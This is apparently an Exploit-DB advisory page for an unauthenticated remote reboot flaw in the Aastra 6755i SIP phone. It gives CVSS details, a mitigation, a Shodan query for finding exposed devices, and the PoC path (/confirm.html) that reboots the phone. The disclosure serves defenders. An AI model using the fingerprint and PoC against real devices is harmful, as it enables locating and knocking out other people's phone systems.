Aastra 6755i SIP SP4 | Unauthorized Remote Reboot

vendor:

6755i SIP SP4

by:

Wadeek

8.8

CVSS

HIGH

Unauthorized Remote Reboot

287

CWE

Product Name: 6755i SIP SP4

Affected Version From: 3.3.1.4053 SP4

Affected Version To: 3.3.1.4053 SP4

Patch Exists: NO

Related CWE: N/A

CPE: h:aastra:6755i_sip_sp4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

Aastra 6755i SIP SP4 | Unauthorized Remote Reboot

A vulnerability in Aastra 6755i SIP SP4 allows an unauthenticated attacker to remotely reboot the device. The vulnerability exists due to the lack of authentication for the /confirm.html page, which allows an attacker to create a crash.cfg file. This file can be used to reboot the device.

Mitigation:

Authentication should be enforced for the /confirm.html page.

Source

Exploit-DB raw data:

# Exploit Title:  Aastra 6755i SIP SP4 | Unauthorized Remote Reboot
# Date: 17/02/2018
# Exploit Author: Wadeek
# Hardware Version: 6755i
# Firmware Version: 3.3.1.4053 SP4
# Vendor Homepage: http://www.aastra.sg/
# Firmware Link: http://www.aastra.sg/cps/rde/aareddownload?file_id=6950-17778-_P32_XML&dsproject=www-aastra-sg&mtype=zip

== Web Fingerprinting ==
#===========================================
:www.shodan.io: "Server: Aragorn" "WWW-Authenticate: Basic realm" "Mitel 6755i"
#===========================================
:Device image: /aastra.png (160x50)
#===========================================
:Crash dump, Firmware version, Firmware model,...: /crashlog.html
#===========================================

== PoC ==
#================================================
:Unauthorized Remote Reboot ("crash.cfg" file is created after): /confirm.html
#================================================